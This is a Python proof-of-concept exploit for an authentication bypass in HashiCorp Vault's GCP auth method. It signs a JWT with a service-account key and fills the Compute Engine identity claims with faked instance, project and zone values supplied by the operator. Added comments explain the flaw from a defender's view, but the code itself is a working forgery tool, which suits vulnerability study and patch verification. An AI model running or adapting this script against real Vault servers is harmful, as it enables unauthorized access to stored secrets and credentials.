#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Proof of Concept Exploit for HashiCorp Vault GCP auth bypass
# 14/07/2020 - [email protected]
import argparse
import jwt
import time
import base64
import json
# Command-line interface. Every identity field that later appears under the
# token's "google.compute_engine" claim is typed in by the operator here, so a
# verifier must never treat those claims as evidence of where a request
# originated unless the token's signer is one it trusts to attest them.
parser = argparse.ArgumentParser()
parser.add_argument(
    "-s",
    "--service_account",
    help="Service Account json file",
    required=True,
)
# Not marked required: when omitted, args.instance_name is None.
parser.add_argument(
    "-i",
    "--instance_name",
    help="Faked Instance Name",
)
parser.add_argument(
    "-p",
    "--project_id",
    help="Faked Project ID",
    required=True,
)
parser.add_argument(
    "-z",
    "--zone",
    help="Faked VM Zone",
    required=True,
)
parser.add_argument(
    "-r",
    "--role",
    help="Vault role",
    required=True,
)
# Parsed at module level; main() reads the resulting namespace as a global.
args = parser.parse_args()
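def main():
    """Build and print a JWT whose GCE identity claims are operator-supplied.

    Reads the service-account JSON file named by ``args.service_account``,
    takes its ``client_email``, ``private_key`` and ``private_key_id``, and
    signs (RS256) a claim set whose ``google.compute_engine`` section is
    filled from the command line. The claim set and the encoded token are
    printed to stdout; nothing is sent anywhere.

    Defensive reading: the token is signed with the key from the supplied
    service-account file and its ``kid`` header names that key, so none of
    the ``compute_engine`` values are attested by anyone but the key holder.
    A relying party that authorizes on instance-identity claims should
    verify such tokens only against the key set of the issuer it trusts to
    attest instances, and should reject a token whose ``kid`` resolves to a
    user-managed service-account key. How the affected Vault verifier
    resolved ``kid`` is not shown on this page; consult the vendor advisory
    for the fixed releases.

    Raises:
        OSError: if the service-account file cannot be opened.
        json.JSONDecodeError: if the file is not valid JSON.
        KeyError: if any of the three expected fields is missing.
    """
    # Context manager closes the key file promptly; the original left the
    # handle open until garbage collection.
    with open(args.service_account) as key_file:
        sa = json.load(key_file)

    sub = sa["client_email"]
    priv = sa["private_key"]
    kid = sa["private_key_id"]

    # Single clock reading so that exp is exactly 30 minutes after iat.
    issued_at = int(time.time())

    token = {
        # NOTE(review): audience prefix reproduced exactly as it appears on
        # the page; it looks altered by extraction, so do not key detections
        # on this literal.
        "aud": "http://vault/"+args.role,
        "iat": issued_at,
        "exp": issued_at+60*30,
        "sub": sub,
        "google": {
            "compute_engine": {
                # instance_id, project_number and the creation timestamp are
                # hard-coded filler values; they are trivially changeable and
                # therefore weak indicators for log-based detection.
                "instance_id": "1",
                "instance_name": args.instance_name,
                "project_id": args.project_id,
                "zone": args.zone,
                "project_number": 1337,
                "instance_creation_timestamp": 9999999999
            }
        }
    }

    print("[x] token: ", token, "\n")

    # The kid header carries the service account's private_key_id, i.e. it
    # points a verifier at the signer's own key rather than an issuer key.
    encoded = jwt.encode(token, priv, algorithm='RS256', headers={"kid": kid})
    print("[x] jwt:", encoded)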
# Call main() only when this file is executed directly.
if __name__ == "__main__":
    main()